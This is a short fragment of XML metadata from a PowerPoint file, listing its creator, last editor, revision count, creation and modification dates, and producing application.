  <dc:creator>Mahesh Azhagumuthu</dc:creator>
  <cp:lastModifiedBy>poojapatro16@outlook.com</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-10-20T01:55:01Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-12-09T02:14:54Z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2024-10-10T00:00:00Z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2024-10-20T00:00:00Z</vt:filetime>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="Producer">
    <vt:lpwstr>Microsoft® PowerPoint® for Microsoft 365</vt:lpwstr>
  </property>
</Properties>
</file>